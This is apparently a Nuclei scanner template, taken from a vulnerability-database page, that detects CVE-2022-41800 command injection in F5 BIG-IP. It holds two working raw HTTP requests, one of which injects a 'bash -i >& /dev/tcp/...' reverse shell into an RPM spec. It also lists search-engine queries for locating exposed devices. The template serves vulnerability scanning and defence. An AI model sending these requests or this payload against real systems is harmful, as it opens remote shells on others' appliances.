id: CVE-2022-41800
info:
name: F5 BIG-IP Appliance Mode - Command Injection
author: dwisiswant0
severity: high
description: |
When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.
remediation: |
Apply security patches from F5 Networks as outlined in K97843387 and ensure Appliance mode restrictions are properly enforced.
impact: |
A successful exploit can allow the attacker to execute remote commands on server using authorization bypass (CVE-2022-1388).
reference:
- https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800/rapid7-analysis
- https://support.f5.com/csp/article/K97843387
- https://support.f5.com/csp/article/K13325942
- https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
- https://nvd.nist.gov/vuln/detail/cve-2022-41800
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
cvss-score: 8.7
cve-id: CVE-2022-41800
cwe-id: CWE-77
epss-score: 0.62406
epss-percentile: 0.99085
cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
vendor: f5
product: big-ip_access_policy_manager
shodan-query:
- http.title:"big-ip®-+redirect" +"server"
- http.html:"big-ip apm"
fofa-query:
- body="big-ip apm"
- title="big-ip®-+redirect" +"server"
google-query: intitle:"big-ip®-+redirect" +"server"
tags: cve,cve2022,rce,f5,bigip,instrusive,vkev,vuln
variables:
auth: "admin:{{rand_text_alpha(1)}}"
rand_app: "{{to_lower(rand_text_alpha(6))}}"
rand_ver: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
rand_rel: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
http:
- raw:
- |
POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1
Host: {{Hostname}}
X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
Authorization: Basic {{base64(auth)}}
Content-Type: application/json
Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host
{
"specFileData": {
"name": "{{rand_app}}",
"srcBasePath": "/tmp",
"version": "{{rand_ver}}",
"release": "{{rand_rel}}",
"description": "\n\n%check\nbash -i >& /dev/tcp/{{interactsh-url}}/{{rand_text_numeric(4)}} 0>&1",
"summary": "{{to_lower(rand_text_alphanumeric(10))}}"
}
}
- |
POST /mgmt/shared/iapp/build-package HTTP/1.1
Host: {{Hostname}}
X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
Authorization: Basic {{base64(auth)}}
Content-Type: application/json
Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host
{
"state": {},
"appName": "{{rand_app}}",
"packageDirectory": "/tmp",
"specFilePath": "{{spec}}",
"force": true
}
extractors:
- type: json
part: body
name: spec
json:
- ".specFilePath"
internal: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "RUN_BUILD_RPM_TASK"
- "shared:iapp:build-package:buildrpmtaskstate"
# digest: 4a0a0047304502202af8f944604b4969f3e30ed20f79e4a05489ce0a7ccba87a7a99debf9b00b065022100cd97da8b7fde728fe940eb378a18eeb2cbdec176888c910f125738cd44ad2ea9:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation